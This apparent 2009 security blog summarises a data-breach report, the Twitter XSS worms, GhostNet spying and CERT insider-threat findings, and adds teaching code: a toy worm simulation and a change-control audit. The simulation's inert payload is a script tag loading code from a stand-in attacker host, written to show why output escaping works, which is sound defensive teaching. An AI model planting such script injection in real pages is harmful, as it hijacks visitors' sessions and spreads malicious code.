The Verizon Business RISK Team's 2009 Data Breach Investigations Report has been released. It is worthy of your attention. -- Richard Power

Our forensics team analyzed thousands of data points from investigations around the world – including many never publicly reported – and found that in 2008 alone, more than 285 million records were compromised. That’s more than the previous four years combined. The 2009 Verizon Business Data Breach Investigations Report offers an objective view of these data breaches, including analysis that we believe will be helpful to the planning and security efforts of our readers.
Here are just a few of our findings:
* 91% of all compromised records were attributed to organized criminal groups
* 99.6% of records were compromised from servers and applications
* 74% resulted from external sources
* 69% were discovered by a 3rd party
* 67% were aided by significant errors
* 32% implicated business partners
2009 Data Breach Investigations Report

Click here to view the full report.

The recent multiple worm assaults on Twitter raise some interesting issues, e.g., as SC Magazine's Chuck Miller writes in the news item excerpted here, "the threat of client-side attacks across social networking sites."

Twitter was struck by a particularly nasty cross-site scripting worm over the weekend, again bringing to light the threat of client-side attacks across social networking sites.
Four variants of the worm hit Twitter, bringing back memories of the infamous -- and groundbreaking -- Samy worm that snaked through MySpace several years ago. ... Each wave of the worm attacks was more intense than its predecessor, according to a post on the official Twitter blog.
SC Magazine, 4-13-09
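The mechanics behind a self-propagating cross-site scripting worm of the Samy or Twitter kind are worth seeing in miniature. The following is an added example written for these notes, not code from Twitter, SC Magazine or the worm's author: a constructed toy site with four profiles, an inert script tag standing in for the worm payload, and a simulated browser that "runs" the payload with the viewer's session and writes it into the viewer's own profile. The only difference between the two runs is whether the profile field is HTML-escaped before it is rendered.

```python
import html
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Constructed, inert payload. In the real worms the script executed in the viewer's browser
# and used the viewer's logged-in session to store a copy of itself in the viewer's profile.
# Nothing here is executed; view() below simulates that behaviour.
WORM_MARKER = '<script src="https://attacker.example/worm.js"></script>'
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_bio_unsafe(bio: str) -> str:
    # Vulnerable: untrusted profile text is concatenated straight into the page.
    return f"<p class='bio'>{bio}</p>"


def render_bio_safe(bio: str) -> str:
    # Fixed: the value is escaped for an HTML text-node context, so '<' becomes '&lt;'.
    return f"<p class='bio'>{html.escape(bio, quote=True)}</p>"


@dataclass
class ToySite:
    profiles: Dict[str, str]              # user -> bio exactly as stored
    render: Callable[[str], str]          # which renderer the site uses

    def view(self, viewer: str, owner: str) -> bool:
        """Simulate `viewer` loading `owner`'s profile. Returns True if the viewer got infected."""
        page = self.render(self.profiles[owner])
        # Simulated browser: a live <script> tag in the page runs as the viewer and
        # appends the worm to the viewer's own profile using the viewer's session.
        if SCRIPT_TAG.search(page) and WORM_MARKER not in self.profiles[viewer]:
            self.profiles[viewer] += WORM_MARKER
            return True
        return False


def simulate(render: Callable[[str], str], views: List[Tuple[str, str]]) -> List[str]:
    """Run a sequence of (viewer, owner) page views and return the users whose profile carries the worm."""
    site = ToySite(
        profiles={  # constructed sample data; "mallory" seeds the payload
            "alice": "hello",
            "bob": "hi",
            "carol": "hey",
            "mallory": WORM_MARKER + "follow me",
        },
        render=render,
    )
    for viewer, owner in views:
        site.view(viewer, owner)
    return sorted(user for user, bio in site.profiles.items() if WORM_MARKER in bio)


# Constructed chain of views: alice looks at mallory, bob at alice, carol at bob.
VIEW_CHAIN = [("alice", "mallory"), ("bob", "alice"), ("carol", "bob")]

if __name__ == "__main__":
    print("unsafe renderer, infected:", simulate(render_bio_unsafe, VIEW_CHAIN))
    print("safe renderer, infected:  ", simulate(render_bio_safe, VIEW_CHAIN))
```

With the unsafe renderer every user in the chain ends up carrying the payload after three page views; with output escaping only the seeded profile does, because the stored text is still there but never becomes markup. That is the whole of the client-side problem Miller describes: the site stores what it is given, and the fix is in how it emits it, not in trying to recognise the payload.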

But another, even bigger issue to ponder is what it means when a technology of any sort (e.g., hardware or software, social networking or telecommunications) can establish such an extraordinary user base so rapidly. According to comScore, "worldwide visitors to Twitter approached 10 million in February, up an impressive 700+% vs. year ago." "The past two months alone have seen worldwide visitors climb more than 5 million visitors. U.S. traffic growth has been just as dramatic," comScore adds, "with Twitter reaching 4 million visitors in February, up more than 1,000% from a year ago." (For more on this data, click here.)

Der Spiegel has an excellent piece on the GhostNet story from the German perspective.

The German government is constantly the target of hackers seeking to insert spy programs into its computer systems. The attacks, often originating in China, are becoming more and more sophisticated. ...
Clues about the hackers can be gleaned from the technical characteristics of an attack, as well as the identities of the target and the subject matter. The aim of the attacks leading up to the chancellor's trip to China, for example, was to ferret out information about issues Merkel wanted to discuss with representatives of the People's Republic.
German intelligence also detected a noticeable increase in cyber attacks before meetings between Merkel and the Dalai Lama. The hackers appear to be particularly interested in the Tibet issue. In January 2008, various German officials received an e-mail with an attached document titled: "Analysis of Chinese Government Policy Toward Tibet." The sender was supposedly a Tibetan organization in the United States. A malicious program was hidden in the analysis.
Der Spiegel, 4-10-09

Tuesday, April 7, 2009

Spotlight On: Programming Techniques Used as an Insider Attack Tool



How they strike
Nine of the insiders in these cases inserted malicious code with the intent of causing harm to their organization or to individuals. Six of the insiders used logic bombs to carry out their attacks. Other attack methods included
• social engineering
• sabotaging backup tapes
• compromising accounts
• deleting and modifying log files
• unauthorized access
• intentionally deploying a virus on customer systems

Spotlight On: Programming Techniques Used as an Insider Attack Tool


Spotlight On: is a quarterly report issued by the CERT Insider Threat Team.

The Insider Threat Team receives significant funding from CyLab.

As one of their benefits, CyLab's corporate partners receive each issue of Spotlight On three months prior to its public release.

So as Programming Techniques Used as an Insider Attack Tool is released to the public, CyLab's partners are now moving on to Malicious Insiders with Ties to the Internet Underground Community, which we will post here on CyBlog in 3Q09.

Spotlight On: Programming Techniques Used as an Insider Attack Tool includes analysis of numerous cases.

Similarities across Cases
While the number of cases analyzed for this article is limited, there are similarities worth noting. The majority of these cases were IT Sabotage cases, which follow the escalation patterns documented in CERT’s MERIT model. The MERIT model is a system dynamics model of the insider IT sabotage problem that elaborates complex interactions in the domain and unintended consequences of organizational policies, practices, technology, and culture on insider behavior.
In each of the fifteen cases, changes made by the insider may have been detected prior to the malicious code being deployed had the organization had change controls in place to detect unauthorized modifications to critical systems and software. Some of the organizations did use configuration management tools to track and log changes to critical software. However, either the tools did not prohibit software from being released without approval from a trusted second person, or the organization failed to audit the change control logs for unauthorized changes.
Programming Techniques Used as an Insider Attack Tool
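The two failure modes CERT names above, a release path that does not require a trusted second person and change logs that nobody audits, are both checkable. The following is an added example written for this post, not code from CERT or the Spotlight On report, and it also illustrates how the logic bombs and other inserted code from the list at the top of the post would surface. It compares a hashed baseline of critical files against their current state and against a list of approved changes, and refuses to count an approval where the author approved their own change. The file paths, digests, names and the ApprovedChange record are constructed for illustration.

```python
import hashlib
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, Iterable, List

DELETED = ""  # sentinel digest meaning "removal of this file was approved"


@dataclass(frozen=True)
class ApprovedChange:
    path: str
    new_sha256: str   # digest the file should have after the change, or DELETED
    author: str
    approver: str     # trusted second person; must not be the author


def sha256_of(path: Path) -> str:
    """Streaming SHA-256 of a file, so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path, patterns: Iterable[str] = ("*.py", "*.sql", "*.sh")) -> Dict[str, str]:
    """Snapshot of relative path -> digest for the critical software tree under `root`."""
    return {
        str(p.relative_to(root)): sha256_of(p)
        for pat in patterns
        for p in sorted(root.rglob(pat))
        if p.is_file()
    }


def audit(baseline: Dict[str, str], current: Dict[str, str],
          approved: List[ApprovedChange]) -> List[str]:
    """Return findings about unapproved modifications; an empty list means everything that
    changed was approved by someone other than its author."""
    findings: List[str] = []
    approvals: Dict[str, str] = {}
    for c in approved:
        if c.author == c.approver:
            # Single-person release: exactly the gap the report describes. Do not honour it.
            findings.append(f"{c.path}: self-approved change by {c.author} does not count")
            continue
        approvals[c.path] = c.new_sha256

    for path, digest in current.items():
        old = baseline.get(path)
        if old == digest:
            continue                       # unchanged
        if approvals.get(path) == digest:
            continue                       # changed, and the new content is what was approved
        kind = "added" if old is None else "modified"
        findings.append(f"{path}: {kind} without matching approval")

    for path in sorted(baseline.keys() - current.keys()):
        if approvals.get(path) != DELETED:
            findings.append(f"{path}: deleted without approval")
    return findings


def demo() -> List[str]:
    """Constructed scenario: one legitimately approved change, one insider-style addition
    that the developer 'approved' themselves, and one silent deletion."""
    a, b, c, d = "a" * 64, "b" * 64, "c" * 64, "d" * 64   # stand-in digests
    baseline = {"billing/payroll.py": a, "billing/util.py": b, "billing/archive.sh": d}
    current = {"billing/payroll.py": c, "billing/util.py": b, "billing/cleanup.py": d}
    approved = [
        ApprovedChange("billing/payroll.py", c, author="dev1", approver="lead1"),
        ApprovedChange("billing/cleanup.py", d, author="dev2", approver="dev2"),
    ]
    return audit(baseline, current, approved)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run against a real tree, build_baseline() is taken at the last trusted release and again at audit time, and the approvals list comes from whatever change-management system holds the second-person sign-off. The point the report makes still stands: the check is only useful if someone reads its output, so the findings belong in a ticket or an alert, not only on a console.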

Spotlight On: Programming Techniques Used as an Insider Attack Tool also articulates a number of practices to help in mitigating this particular aspect of the insider threat.

See also the third edition of CERT's Common Sense Guide to Prevention and Detection of Insider Threats, and its empirically-based insider threat risk assessment diagnostic.

To read a CyLab Chronicles Q&A with CERT Insider Threat Team leader Dawn Cappelli, click here.

For information on the benefits of partnering with CyLab, contact Gene Hambrick, CyLab Director of Corporate Relations: hambrick at andrew.cmu.edu

-- Richard Power